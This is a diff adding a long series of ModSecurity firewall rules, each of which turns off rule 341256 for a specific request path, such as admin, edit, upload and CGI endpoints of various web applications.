+SecRule REQUEST_FILENAME "/sifr\.swf" "phase:2,id:94288,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/smalladmin/index\.php" "phase:2,id:94289,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content_manager\.php" "phase:2,id:94290,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/account/loginpost/" "phase:2,id:94291,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/package_edit\.php" "phase:2,id:94292,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/setup\.cgi" "phase:2,id:94293,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pncrtl/template\.php" "phase:2,id:94294,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/novedades_abm\.php" "phase:2,id:94295,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/pmanage/pmanage\.cgi" "phase:2,id:94296,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sage/download\.php" "phase:2,id:94297,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/versioncheck\.php" "phase:2,id:94298,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kameleon\.php" "phase:2,id:94299,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/click\.php" "phase:2,id:94300,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/cruise_co_process\.php" "phase:2,id:94301,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/supportcenter/" "phase:2,id:94302,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sendmail\.php" "phase:2,id:94303,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/files_code\.php" "phase:2,id:94304,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modify\.php" "phase:2,id:94305,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/layout/edit/" "phase:2,id:94306,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_behaviour\.php" "phase:2,id:94307,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/otrs/index\.pl" "phase:2,id:94308,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content/edit/" "phase:2,id:94309,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ises/config\.php" "phase:2,id:94310,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cacti/data_input\.php" "phase:2,id:94311,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/bmailercp\.cgi" "phase:2,id:94312,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin\.php" "phase:2,id:94313,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/control_panel\.php" "phase:2,id:94314,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:94315,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/css/gallery-css\.php" "phase:2,id:94316,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/rcv_paypal\.php" "phase:2,id:94317,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload_crop\.php" "phase:2,id:94318,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/generic_edit\.php" "phase:2,id:94319,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit_workshops\.php" "phase:2,id:94320,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/collect_db\.php" "phase:2,id:94321,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/a__iiconcreatelive\.php" "phase:2,id:94322,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/etc/get_testimonial\.php" "phase:2,id:94323,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_vti_bin/_vti_aut/author\.exe" "phase:2,id:94324,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/reclame\.php" "phase:2,id:94325,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/itron\.php" "phase:2,id:94326,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcode\.php" "phase:2,id:94327,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/query_highlighted_block\.php" "phase:2,id:94328,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/query_block_highlight\.php" "phase:2,id:94329,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/query_block\.php" "phase:2,id:94330,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopadmin/index\.php" "phase:2,id:94331,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/rss\.php" "phase:2,id:94332,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/cms-edit\.php" "phase:2,id:94333,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/manufacturers\.php" "phase:2,id:94334,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/eventaddaction\.php" "phase:2,id:94335,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings/customerror" "phase:2,id:94336,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_design\.php" "phase:2,id:94337,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/api\.php" "phase:2,id:94338,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editresult_listing\.php" "phase:2,id:94339,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/products_product_process\.php" "phase:2,id:94340,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_prod\.php" "phase:2,id:94341,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editproperty_process\.php" "phase:2,id:94342,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sections_process\.php" "phase:2,id:94343,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sg_saveentry\.php" "phase:2,id:94344,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_content_config\.php" "phase:2,id:94345,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/credit_log2\.php" "phase:2,id:94346,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/folio-edit\.php" "phase:2,id:94347,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:94348,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:94349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:94350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/flvprovider\.php" "phase:2,id:94351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/subscribe_user2group\.php" "phase:2,id:94352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcontent_process\.php" "phase:2,id:94353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/select_category\.php" "phase:2,id:94354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/options\.php" "phase:2,id:94355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editroster\.php" "phase:2,id:94356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/process\.php" "phase:2,id:94357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/properties\.php" "phase:2,id:94358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_update\.php" "phase:2,id:94359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/prodadd\.php" "phase:2,id:94360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mt\.fcgi" "phase:2,id:94361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mt\.cgi" "phase:2,id:94362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/systeembeheer/" "phase:2,id:94363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/add_sighting\.php" "phase:2,id:94364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ticket_detail\.php" "phase:2,id:94365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/createsite\.php" "phase:2,id:94366,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cleanedit\.php" "phase:2,id:94367,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/zabbix/setup\.php" "phase:2,id:94368,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upldgallery\.php" "phase:2,id:94369,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tooltip_result\.php" "phase:2,id:94370,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_orders\.php" "phase:2,id:94371,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tableedit\.php" "phase:2,id:94372,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_previewjobs\.php" "phase:2,id:94373,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/businessadd2\.php" "phase:2,id:94374,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/packages-rest\.php" "phase:2,id:94375,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:94376,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editmessagesexec\.php" "phase:2,id:94377,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/backend\.php" "phase:2,id:94378,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/redirect\.php" "phase:2,id:94379,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edetailing_nsclc\.html" "phase:2,id:94380,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wibstats\.php" "phase:2,id:94381,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/plugin\.php" "phase:2,id:94382,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/maakpromotieorderb\.php" "phase:2,id:94383,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/listcontent\.php" "phase:2,id:94384,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/showtable/update\.php" "phase:2,id:94385,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/locations/editphoto\.php" "phase:2,id:94386,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/translation_tool\.php" "phase:2,id:94387,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edituserplugin\.php" "phase:2,id:94388,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/mailbox\.php" "phase:2,id:94389,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/services/prefs\.php" "phase:2,id:94390,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/update-page\.php" "phase:2,id:94391,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/uploadify/uploadify\.php" "phase:2,id:94392,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/savestory\.php" "phase:2,id:94393,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/chat/server\.php" "phase:2,id:94394,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cha-insertproduct\.php" "phase:2,id:94395,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ezedit/server\.php" "phase:2,id:94396,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cometchat_receive\.php" "phase:2,id:94397,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/news_editresult\.php" "phase:2,id:94398,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/news\.php" "phase:2,id:94399,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/items_attribute_result\.php" "phase:2,id:94400,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bcadmn/index\.php" "phase:2,id:94401,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thub\.php" "phase:2,id:94402,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/sidenavsave\.php" "phase:2,id:94403,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/message\.php" "phase:2,id:94404,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/editor/wsd" "phase:2,id:94405,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/sitesettings\.php" "phase:2,id:94406,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/workadmin\.php" "phase:2,id:94407,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addons/imagelibrary/select_image\.php" "phase:2,id:94408,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/news_edit\.php" "phase:2,id:94409,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-faq-css\.php" "phase:2,id:94410,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cfk-action\.php" "phase:2,id:94411,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/htmle\.php" "phase:2,id:94412,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/product_edit\.php" "phase:2,id:94413,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/backuppc_admin" "phase:2,id:94414,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/delivery/spc\.php" "phase:2,id:94415,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/share\.php" "phase:2,id:94416,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kronolith/" "phase:2,id:94417,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/delivery/ajs\.php" "phase:2,id:94418,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/browse\.php" "phase:2,id:94419,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/watermark\.php" "phase:2,id:94420,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addcontent\.php" "phase:2,id:94421,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/showmail\.php" "phase:2,id:94422,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aprogram\.php" "phase:2,id:94423,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit-event\.php" "phase:2,id:94424,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:94425,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:94426,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/company/modify\.php" "phase:2,id:94427,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dimcp/setting\.php" "phase:2,id:94428,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jg_radiof\.php" "phase:2,id:94429,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiki-editpage\.php" "phase:2,id:94430,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/power_news_add\.php" "phase:2,id:94431,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jg_teksta\.php" "phase:2,id:94432,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/static_content_editresult\.php" "phase:2,id:94433,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopadmin/login\.php" "phase:2,id:94434,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sgal_thumb\.php" "phase:2,id:94435,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/image\.php" "phase:2,id:94436,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax\.php" "phase:2,id:94437,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/saveconfig\.php" "phase:2,id:94438,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/products\.php" "phase:2,id:94439,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit-process\.php" "phase:2,id:94440,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:94441,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/freepost\.php" "phase:2,id:94442,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/advertpro/admin/admin\.pl" "phase:2,id:94443,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/inc/flash_to_db_insert\.php" "phase:2,id:94444,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/blocks/form/services\.php" "phase:2,id:94445,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings/" "phase:2,id:94446,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/ispmgr" "phase:2,id:94447,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editimage\.html" "phase:2,id:94448,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/siteprefs\.php" "phase:2,id:94449,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/include/update\.php" "phase:2,id:94450,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/directory\.php" "phase:2,id:94451,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/video_add\.php" "phase:2,id:94452,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/products/entry/index\.php" "phase:2,id:94453,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editconfirm\.php" "phase:2,id:94454,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/element/snippet\.php" "phase:2,id:94455,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/podpress/podpress_backend\.ph" "phase:2,id:94456,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/productos_edit\.php" "phase:2,id:94457,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/produto_script\.php" "phase:2,id:94458,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_structure\.php" "phase:2,id:94459,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:94460,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/hades_framework/option_panel/ajax\.php" "phase:2,id:94461,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:94462,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/s_listing\.php" "phase:2,id:94463,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/module-inventory/" "phase:2,id:94464,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/items_name_result\.php" "phase:2,id:94465,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webmail/src/addressbook\.php" "phase:2,id:94466,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:94467,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
